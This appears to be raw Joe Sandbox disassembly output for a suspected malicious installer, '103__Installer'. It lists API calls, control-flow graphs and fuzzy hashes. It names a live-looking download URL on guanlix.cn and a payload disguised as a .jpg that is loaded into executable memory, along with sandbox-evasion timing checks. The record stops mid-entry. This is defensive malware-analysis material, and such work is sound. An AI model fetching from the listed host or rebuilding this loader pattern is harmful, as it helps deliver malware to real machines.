                  Control-flow Graph

                  APIs
                  • GetTickCount64.KERNEL32 ref: 00B711EF
                  • Sleep.KERNEL32(0000012C), ref: 00B711F9
                  • GetTickCount64.KERNEL32 ref: 00B711FF
                    • Part of subcall function 00B74424: __vwprintf_l.LIBCMT ref: 00B74432
                  • CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00B71244
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00B7124E
                  • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00B7125F
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00B71270
                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 00B71277
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: File$Count64Tick$AllocChangeCloseCreateFindNotificationReadSizeSleepVirtual__vwprintf_l
                  • String ID: C:\Users\Public\Downloads\ind.jpg$`3Mw01Mw$sandbox!!!$v4:%d
                  • API String ID: 2034448642-531378182
                  • Opcode ID: da0238c70b080f3348614ebfc01efe7bbf04928e9eb874d1efff7b6158ab422c
                  • Instruction ID: b7b366e9560f8ef4c11d7d6e7f26237cf601d154daf90060d7df5a4693eaeb10
                  • Opcode Fuzzy Hash: da0238c70b080f3348614ebfc01efe7bbf04928e9eb874d1efff7b6158ab422c
                  • Instruction Fuzzy Hash: FE11A2736442147FEA206BF96C59FBB7AACEB46771F240525FA09D31A0DAA05D00C2B1

                  Control-flow Graph

                  APIs
                  • __EH_prolog.LIBCMT ref: 00B72E42
                  • InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00B72E5E
                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00B72E7B
                  • InternetCloseHandle.WININET(?), ref: 00B72F0F
                    • Part of subcall function 00B72D13: __EH_prolog.LIBCMT ref: 00B72D18
                  • InternetReadFile.WININET(?,?,00001000,?), ref: 00B72EE1
                  • InternetCloseHandle.WININET(?), ref: 00B72EF7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: Internet$CloseH_prologHandleOpen$FileRead
                  • String ID: Download
                  • API String ID: 2208602198-2171396134
                  • Opcode ID: f4614a816583d3f15e0a1ae90d9597595a25297e845ba8ac3bb484944f8b11b3
                  • Instruction ID: 3ced716e03c32f750ac026226354d4c878e7d9292990f353141be1ce37576941
                  • Opcode Fuzzy Hash: f4614a816583d3f15e0a1ae90d9597595a25297e845ba8ac3bb484944f8b11b3
                  • Instruction Fuzzy Hash: E121EC7190011AEFEF20AB94CC89FFEBBB9FB04354F1441A9B519B61A1D7705E44DB60

                  Control-flow Graph

                  APIs
                  • __EH_prolog.LIBCMT ref: 00B72E42
                  • InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00B72E5E
                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00B72E7B
                  • InternetCloseHandle.WININET(?), ref: 00B72F0F
                    • Part of subcall function 00B72D13: __EH_prolog.LIBCMT ref: 00B72D18
                  • InternetReadFile.WININET(?,?,00001000,?), ref: 00B72EE1
                  • InternetCloseHandle.WININET(?), ref: 00B72EF7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: Internet$CloseH_prologHandleOpen$FileRead
                  • String ID: Download
                  • API String ID: 2208602198-2171396134
                  • Opcode ID: b409a93613ad56e0e1fbdce94918ce92b531684f948a2283009bd7497ef730dc
                  • Instruction ID: 3ff8cef24b728f87ba3ed7748c6d8c1c0fab03788a67b8d775b4c955c3f9bce5
                  • Opcode Fuzzy Hash: b409a93613ad56e0e1fbdce94918ce92b531684f948a2283009bd7497ef730dc
                  • Instruction Fuzzy Hash: 45112C71900119EFEF20AB94CC89FEEBAB9EB04354F1441A9B619B61A0C7705E40CB60

                  Control-flow Graph

                  APIs
                  • LoadLibraryA.KERNEL32(?,00000000,00000002,?,03ABFCB5,00000000), ref: 03ABFFF5
                  • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,03ABFCB5,00000000), ref: 03AC0035
                  • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 03AC0068
                  • VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 03AC0093
                  • VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 03AC00BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3ab0000_103__Installer.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProtectVirtual$LibraryLoad
                  • String ID:
                  • API String ID: 895956442-0
                  • Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
                  • Instruction ID: ef26164d3eee0b554b1a87e23d664612d993989b83cb11713ffb2b94da345451
                  • Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
                  • Instruction Fuzzy Hash: A821C876215349AFD320DA64CC48E7BBBECEB84301B06083FBA47D2551EB74E5048661

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 75 b72964-b72976 call b74948 78 b7297c-b72986 75->78 79 b72978-b7297a 75->79 81 b729b4-b729b7 78->81 82 b72988-b72991 78->82 80 b729a4-b729b1 79->80 84 b729d4-b729d7 81->84 85 b729b9-b729c3 call b71986 81->85 82->81 83 b72993-b7299f 82->83 87 b729a1 83->87 86 b729a3 84->86 90 b729c5-b729c9 call b71fca 85->90 91 b729d9-b729f5 call b72512 85->91 86->80 87->86 94 b729ce-b729d2 90->94 96 b729f8-b729ff 91->96 94->84 94->87 97 b72a05-b72a08 96->97 98 b72a8c-b72a8f 96->98 99 b72a0a-b72a2d 97->99 98->99 101 b72a2f-b72a32 99->101 102 b72aaa 99->102 103 b72a94-b72a97 101->103 104 b72a34-b72a3b 101->104 105 b72aad-b72abb call b71c12 102->105 103->102 107 b72a99-b72aa8 call b71fca 103->107 108 b72a40-b72a45 104->108 109 b72a3d 104->109 105->86 107->102 115 b72ac0-b72ac3 107->115 112 b72a47-b72a4e 108->112 113 b72a66-b72a70 108->113 109->108 117 b72a53-b72a64 call b7566a 112->117 118 b72a50 112->118 114 b72a72-b72a74 113->114 113->115 114->96 120 b72a76-b72a7a 114->120 115->105 117->102 117->113 118->117 120->102 122 b72a7c-b72a87 call b72408 120->122 122->96
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: Fputc$H_prolog
                  • String ID:
                  • API String ID: 1896196775-3916222277
                  • Opcode ID: 2aeda205b46232bdffd482e0606d86d76d8b906a7ed6fdf26bf36797777554db
                  • Instruction ID: 07456b1608c3aa302ee8fcd402767c0a1a6f9825560241a7483d62ff828e7b8a
                  • Opcode Fuzzy Hash: 2aeda205b46232bdffd482e0606d86d76d8b906a7ed6fdf26bf36797777554db
                  • Instruction Fuzzy Hash: 6E410731904205DFDF24CB98C980AEEB3F5FF54310F2485AAE56AA7281D770AD40CB60

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 125 3ac00cd-3ac00e2 127 3ac00ea-3ac00fb 125->127 128 3ac00e4-3ac00e5 125->128 131 3ac01ab 127->131 132 3ac0101-3ac010c 127->132 129 3ac01af-3ac01b2 128->129 133 3ac01ad-3ac01ae 131->133 132->131 134 3ac0112-3ac0120 VirtualProtect 132->134 133->129 134->131 135 3ac0126-3ac0160 call 3ac161e call 3ac18bb VirtualProtect 134->135 135->131 141 3ac0162-3ac016e 135->141 141->131 142 3ac0170-3ac017e VirtualProtect 141->142 142->131 143 3ac0180-3ac01a9 call 3ac161e call 3ac18bb VirtualProtect 142->143 143->133
                  APIs
                  • VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 03AC011B
                  • VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 03AC014E
                  • VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 03AC0179
                  • VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 03AC01A3
                  Memory Dump Source
                  • Source File: 00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3ab0000_103__Installer.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
                  • Instruction ID: 66c7c864b9f5ab7a9096083d64125ae62d8e092b271989ca15847db6c68b0342
                  • Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
                  • Instruction Fuzzy Hash: B1216872314789AFE720DA65DD88E77B7ECEB88601B04083EBA87E1552EB74F5054A70

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00B71186: __time64.LIBCMT ref: 00B7118E
                    • Part of subcall function 00B71186: _rand.LIBCMT ref: 00B7119E
                    • Part of subcall function 00B71186: _rand.LIBCMT ref: 00B711AD
                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 00B72F33
                    • Part of subcall function 00B72E3D: __EH_prolog.LIBCMT ref: 00B72E42
                    • Part of subcall function 00B72E3D: InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00B72E5E
                    • Part of subcall function 00B72E3D: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00B72E7B
                    • Part of subcall function 00B72E3D: InternetReadFile.WININET(?,?,00001000,?), ref: 00B72EE1
                    • Part of subcall function 00B72E3D: InternetCloseHandle.WININET(?), ref: 00B72EF7
                    • Part of subcall function 00B72E3D: InternetCloseHandle.WININET(?), ref: 00B72F0F
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B72F54
                    • Part of subcall function 00B7168B: _wprintf.LIBCMT ref: 00B7169D
                    • Part of subcall function 00B7168B: _wprintf.LIBCMT ref: 00B716B5
                    • Part of subcall function 00B7168B: _wprintf.LIBCMT ref: 00B716CA
                    • Part of subcall function 00B711E1: GetTickCount64.KERNEL32 ref: 00B711EF
                    • Part of subcall function 00B711E1: Sleep.KERNEL32(0000012C), ref: 00B711F9
                    • Part of subcall function 00B711E1: GetTickCount64.KERNEL32 ref: 00B711FF
                    • Part of subcall function 00B711E1: CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00B71244
                    • Part of subcall function 00B711E1: GetFileSize.KERNEL32(00000000,00000000), ref: 00B7124E
                    • Part of subcall function 00B711E1: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00B7125F
                    • Part of subcall function 00B711E1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00B71270
                    • Part of subcall function 00B711E1: FindCloseChangeNotification.KERNEL32(00000000), ref: 00B71277
                  Strings
                  • http://guanlix.cn:881/103.ccp, xrefs: 00B72F3E
                  • C:\Users\Public\Downloads\ind.jpg, xrefs: 00B72F39
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: Internet$File$CloseVirtual_wprintf$AllocCount64HandleOpenReadTick_rand$ChangeCreateFindFreeH_prologNotificationSizeSleep__time64
                  • String ID: C:\Users\Public\Downloads\ind.jpg$http://guanlix.cn:881/103.ccp
                  • API String ID: 1532265807-3614036361
                  • Opcode ID: 66bd0e7844145aa3086fd48b9e9575e3e6772bd0329b287babd9ba649f37a164
                  • Instruction ID: 0bd1d2a743782acc2a9e6a0dbf222035409cca6157cb74546a8d86deeab3658c
                  • Opcode Fuzzy Hash: 66bd0e7844145aa3086fd48b9e9575e3e6772bd0329b287babd9ba649f37a164
                  • Instruction Fuzzy Hash: FFE012712482507AFA5073B86C0FFAE15D49B00B51F158891F615B90E1DD945941D77D

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 157 3abfb37-3abfb76 call 3ac1628 * 2 162 3abfb7c-3abfb7e 157->162 163 3abfd91 157->163 162->163 165 3abfb84-3abfb95 VirtualAlloc 162->165 164 3abfd94-3abfd9b 163->164 165->163 166 3abfb9b-3abfbe9 call 3ac18bb call 3ac18df call 3ac17ba call 3ac1695 165->166 175 3abfbef-3abfbf5 166->175 176 3abfd3e-3abfd4a 166->176 175->176 177 3abfbfb-3abfc15 call 3ac1628 175->177 178 3abfd7a-3abfd8f call 3ac18df 176->178 179 3abfd4c-3abfd54 176->179 177->163 187 3abfc1b-3abfc23 177->187 178->164 179->178 182 3abfd56-3abfd73 call 3ac18df 179->182 182->178 189 3abfc3b-3abfc41 187->189 190 3abfc25 187->190 193 3abfc43-3abfc46 189->193 194 3abfc77-3abfc82 189->194 192 3abfc2b-3abfc39 LoadLibraryA 190->192 192->189 192->192 197 3abfc49-3abfc62 call 3ac1628 193->197 195 3abfc99-3abfca2 194->195 196 3abfc84-3abfc8d call 3ac01b3 194->196 199 3abfca6-3abfcad 195->199 200 3abfca4 195->200 206 3abfd3a 196->206 210 3abfc93 196->210 197->206 207 3abfc68-3abfc75 197->207 204 3abfcaf-3abfcb8 call 3abffe7 199->204 205 3abfcd5-3abfcd8 199->205 200->199 218 3abfcba-3abfcc0 204->218 219 3abfcc2-3abfcc3 call 3ac00cd 204->219 208 3abfcda-3abfcdd 205->208 209 3abfd33-3abfd34 call 3ac0eca 205->209 206->176 207->194 207->197 208->209 212 3abfcdf-3abfce2 208->212 217 3abfd39 209->217 210->195 215 3abfd07-3abfd16 call 3ac09f9 212->215 216 3abfce4-3abfce6 212->216 228 3abfd18-3abfd1e call 3ac0c04 215->228 229 3abfd25-3abfd31 call 3ac058d 215->229 216->215 221 3abfce8-3abfceb 216->221 217->206 218->206 218->219 223 3abfcc8-3abfccb 219->223 225 3abfcff-3abfd05 call 3ac1351 221->225 226 3abfced-3abfcf0 221->226 223->205 227 3abfccd-3abfcd3 223->227 225->217 226->225 230 3abfcf2-3abfcf5 226->230 227->205 227->206 236 3abfd23-3abfd24 228->236 229->217 230->206 234 3abfcf7-3abfcfd call 3ac14e2 230->234 234->217 236->229
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 03ABFB8F
                  • LoadLibraryA.KERNEL32(00000238), ref: 03ABFC2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3ab0000_103__Installer.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocLibraryLoadVirtual
                  • String ID:
                  • API String ID: 3550616410-0
                  • Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
                  • Instruction ID: 8d09d847fc4ff0cde9c3597f4cf3dcdc6e44d1e810b01fccb37167ee306e35c9
                  • Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
                  • Instruction Fuzzy Hash: F361AC76501B02AFCB22EB608D84AABF3BDFF05214F1C0A1FEA5A49541E735F151CB51

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 240 b75902-b7591e call b7a940 243 b75935-b75939 240->243 244 b75920-b75933 call b7a8eb call b7a899 240->244 246 b7593b 243->246 247 b75948-b75954 call b750e4 call b75895 243->247 253 b75942-b75947 call b7a985 244->253 249 b7593f 246->249 257 b75959-b75969 call b7596e 247->257 249->253 257->249
                  APIs
                    • Part of subcall function 00B7A8EB: __getptd_noexit.LIBCMT ref: 00B7A8EB
                  • __lock_file.LIBCMT ref: 00B75949
                    • Part of subcall function 00B750E4: __lock.LIBCMT ref: 00B75109
                  • __fclose_nolock.LIBCMT ref: 00B75954
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                  • String ID:
                  • API String ID: 2800547568-0
                  • Opcode ID: ad32bdcd4bd7063ae0ca762730e31d11f8ce48775021c5fea5ec2533cedd051b
                  • Instruction ID: a04f5f1987b27492a650ebfc34244888e52cfb9f80bacf6c7454f05bd24a6bba
                  • Opcode Fuzzy Hash: ad32bdcd4bd7063ae0ca762730e31d11f8ce48775021c5fea5ec2533cedd051b
                  • Instruction Fuzzy Hash: 1EF09630800B05DADB70BB74884275E7BE0AF41330F25C3C8E53DAA0D1C7BC59029B56

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 474 5f875e0-5f875eb 475 5f875ed-5f87614 call 5f85ebc 474->475 476 5f87615-5f87634 call 5f86f64 474->476 482 5f8763a-5f87699 476->482 483 5f87636-5f87639 476->483 490 5f8769b-5f8769e 482->490 491 5f8769f-5f8772c GlobalMemoryStatusEx 482->491 495 5f8772e-5f87734 491->495 496 5f87735-5f8775d 491->496 495->496
                  Memory Dump Source
                  • Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8f952fca476bc4c4c967088c490d3ecdb2cc3577e1e491521f326789dee48a18
                  • Instruction ID: a257fa06cd2ce03ddcef952d780df9b7b7e5e8328561353aa5222b4622ccb15f
                  • Opcode Fuzzy Hash: 8f952fca476bc4c4c967088c490d3ecdb2cc3577e1e491521f326789dee48a18
                  • Instruction Fuzzy Hash: 20410572E043598FDB14EF79D8047AEBBF5EF89210F14866AD849E7240DB789841CBD0

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 499 b71830-b71843 500 b718ee-b718f6 499->500 501 b71849 499->501 502 b71854-b71856 501->502 503 b7184b-b7184e 501->503 504 b7185a-b7185f 502->504 503->500 503->502 505 b71866-b7186d 504->505 506 b71861-b71864 504->506 507 b718b0-b718bb call b72964 505->507 508 b7186f 505->508 506->505 513 b718be-b718c1 507->513 509 b71875-b71878 508->509 510 b71871-b71873 508->510 511 b71887-b718ae call b73dd0 509->511 512 b7187a 509->512 510->507 510->509 520 b718d6-b718da 511->520 514 b71881-b71884 512->514 515 b7187c-b7187f 512->515 517 b718c3-b718d2 513->517 518 b718ec-b718ed 513->518 514->511 515->511 515->514 517->520 518->500 521 b718e0 520->521 522 b71858 520->522 521->518 523 b718e2-b718e6 521->523 522->504 523->518 523->522
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: _memmove
                  • String ID:
                  • API String ID: 4104443479-0
                  • Opcode ID: b31e1f9b03b365c2f3d260a60de42dfc28d177028125769d53eafa99e593f33c
                  • Instruction ID: 20f8161a904186111208c55a83ef44eff8511e377c935d6701735a830830900b
                  • Opcode Fuzzy Hash: b31e1f9b03b365c2f3d260a60de42dfc28d177028125769d53eafa99e593f33c
                  • Instruction Fuzzy Hash: BA314935910249EFCB50CF5DC88459977F4FF09324F14CAAAE82896151E3709A50DFA2
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05F87632), ref: 05F8771F
                  Memory Dump Source
                  • Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd
                  Similarity
                  • API ID: GlobalMemoryStatus
                  • String ID:
                  • API String ID: 1890195054-0
                  • Opcode ID: ec5d1bcd7164a6242b4dcd93738495c75ab5c403a332b48cda9ac3ab031ba053
                  • Instruction ID: 29ba5cba6e04f0e76c5c98c7c8bc9c4753050895134bf16628bc6aef0ca703eb
                  • Opcode Fuzzy Hash: ec5d1bcd7164a6242b4dcd93738495c75ab5c403a332b48cda9ac3ab031ba053
                  • Instruction Fuzzy Hash: 562168B1C0465A9FDB10DFAAC444BAEFBB4FF08310F24816AD858A7200D378A940CFA1
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 516d242881023e8ad0ac6e690d1cd5122729604b5c509c36d0b4f7e430ed8d9b
                  • Instruction ID: d5eccca8e7d318b83510ca4c70ee252ac0a00a26f7749df7429088bc6b6cf3af
                  • Opcode Fuzzy Hash: 516d242881023e8ad0ac6e690d1cd5122729604b5c509c36d0b4f7e430ed8d9b
                  • Instruction Fuzzy Hash: BB112BB1610204AFDB24DF99C885AAEF7F9EB54748F0488AEF45AA7251C7B19D01CB60
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 4b5ab792db989f7ff8b7e9b1a7721ea6eef0c46abe6bbd9c04ac20084e3eda0a
                  • Instruction ID: 0cda78ce70e848f5800a05f79d8af2a6f10463319c72f71965ecd75af83ea299
                  • Opcode Fuzzy Hash: 4b5ab792db989f7ff8b7e9b1a7721ea6eef0c46abe6bbd9c04ac20084e3eda0a
                  • Instruction Fuzzy Hash: 2C113DB1610204AFDB24DF99C885AAEF7F9FB54748F0488AEF45AA7251C3B19D01CB60
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05F87632), ref: 05F8771F
                  Memory Dump Source
                  • Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd
                  Similarity
                  • API ID: GlobalMemoryStatus
                  • String ID:
                  • API String ID: 1890195054-0
                  • Opcode ID: 1ee7dfbc182b633779b6ab7528f4a6795f1c63233b75d78de51c219b790e224e
                  • Instruction ID: f5841ab0955e7cca4e1bb8a6dd555ba12bb26c945d4acf93e17a227eb47867c4
                  • Opcode Fuzzy Hash: 1ee7dfbc182b633779b6ab7528f4a6795f1c63233b75d78de51c219b790e224e
                  • Instruction Fuzzy Hash: B51144B2C006599BDB10DFAAC445BEEFBB4FF48220F14812AD818A7200D378A940CFA5
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05F87632), ref: 05F8771F
                  Memory Dump Source
                  • Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd
                  Similarity
                  • API ID: GlobalMemoryStatus
                  • String ID:
                  • API String ID: 1890195054-0
                  • Opcode ID: f062cceb0ad03ad198682f79d06ff068cbd6c6e4269fb65a513458bdab0bbf45
                  • Instruction ID: f53ac8a21e6997d665dcad285d7f269a4b9c16ee9a4f0c75af0b833b11c6d842
                  • Opcode Fuzzy Hash: f062cceb0ad03ad198682f79d06ff068cbd6c6e4269fb65a513458bdab0bbf45
                  • Instruction Fuzzy Hash: 531106B2C046599BDB10DF9AD5447EEFBB4FF48210F14816AE818A7240D379A944CFA5
                  APIs
                  • __EH_prolog.LIBCMT ref: 00B7246D
                    • Part of subcall function 00B7130B: std::locale::facet::_Incref.LIBCPMT ref: 00B7131E
                    • Part of subcall function 00B72344: __EH_prolog.LIBCMT ref: 00B72349
                    • Part of subcall function 00B72344: std::_Lockit::_Lockit.LIBCPMT ref: 00B72358
                    • Part of subcall function 00B72344: int.LIBCPMT ref: 00B7236F
                  Memory Dump Source
